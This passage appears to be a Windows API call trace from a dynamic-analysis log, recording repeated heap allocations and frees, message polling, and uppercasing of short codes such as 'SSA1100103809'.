(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0215.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0215.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0215.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0215.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0215.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.298] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0215.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0215.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.298] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0215.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0215.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.299] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0215.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.299] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0215.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0215.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.300] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0215.300] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0215.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0215.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0215.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0215.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0215.301] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0215.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab9e0 [0215.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a10 [0215.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0215.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0215.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0215.302] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0215.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0215.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0215.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0215.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0215.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a10 | out: hHeap=0x2af0000) returned 1 [0215.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0215.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0215.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0215.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0215.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0215.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.304] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0215.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7e8 [0215.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f68 [0215.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0215.308] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0215.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f68 | out: hHeap=0x2af0000) returned 1 [0215.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0215.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0215.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0215.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0215.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0215.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0215.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0215.310] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab800 [0215.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.311] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 